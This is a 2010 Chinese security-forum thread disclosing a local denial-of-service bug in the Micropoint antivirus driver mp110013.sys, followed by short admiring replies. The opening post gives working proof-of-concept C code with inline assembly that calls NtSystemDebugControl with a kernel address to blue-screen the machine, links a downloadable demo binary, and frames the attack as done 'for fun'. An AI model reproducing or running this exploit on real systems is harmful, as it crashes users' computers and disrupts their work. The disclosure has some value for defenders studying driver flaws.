查看: 4240|回复: 20
收起左侧

[微点] 微点主动防御mp110013.sys <= 1.3.10123.0 NtSystemDebugControl 本地拒绝服务漏洞

  [复制链接]
3x3eyes
头像被屏蔽
发表于 2010-4-6 20:19:30 | 显示全部楼层 |阅读模式

产品版本:微点主动防御:mp.100323.1.2.10581.0278.r1
文件版本:mp110013.sys 1.3.10123.0 timestamp:4BA1863F checksum 1e7b8
问题:没有正确处理NtSystemDebugControl WriteVirtual/WritePhysical 中的 Address/Buffer成员,引发拒绝服务漏洞

测试程序:http://mj0011.ys168.com 漏洞演示目录下 mpbsod_fun_2.rar,运行后系统即崩溃
typedef struct _SYSDBG_VIRTUAL {
    PVOID Address;
    PVOID Buffer;
    ULONG Request;
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;
int main(int argc, char* argv[])
{
printf("Micropoint Local D.O.S Vulnerability\n"
   "BSOD Micropoint for fun!\n"
   "By MJ0011\nth_decoder$126.com\n\nPress Enter...\n");
getchar();
SYSDBG_VIRTUAL sbv ;
sbv.Address = (PVOID)0x80000000;
PVOID pAddr = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSystemDebugControl");
__asm
{
   push 0
   push 0
   push 0
   lea eax , sbv
   push eax
   push 0xb
   call pAddr
}
return 0;
}

评分

参与人数 2经验 +10 人气 +1 收起 理由
dl123100 + 1 支持一下
darnaydeng + 10 感谢分享:)

查看全部评分

专业路过
发表于 2010-4-6 20:26:50 | 显示全部楼层
哇,楼主真厉害呀
白羊座
发表于 2010-4-6 20:27:46 | 显示全部楼层
卖糕的,你不好好玩你的事,又出来做这事情了
3x3eyes
头像被屏蔽
 楼主| 发表于 2010-4-6 20:28:21 | 显示全部楼层
没事调戏一下微点~ 娱乐娱乐
专业路过
发表于 2010-4-6 20:41:20 | 显示全部楼层
我晕啊
soft_killer
发表于 2010-4-6 21:18:19 | 显示全部楼层
kerry
发表于 2010-4-6 23:58:44 | 显示全部楼层
过来看下牛人
wywja
发表于 2010-4-7 00:19:28 | 显示全部楼层
向牛人学习
zzjzzpgg12
头像被屏蔽
发表于 2010-4-11 20:09:26 | 显示全部楼层
但是。偶运行了,结果什么都没发生啊。。
钢铁侠
发表于 2010-4-12 23:59:31 | 显示全部楼层
有点搞笑的是我运行后弹出一个窗口:


mj能否解释一下。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-22 12:03 , Processed in 0.121217 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表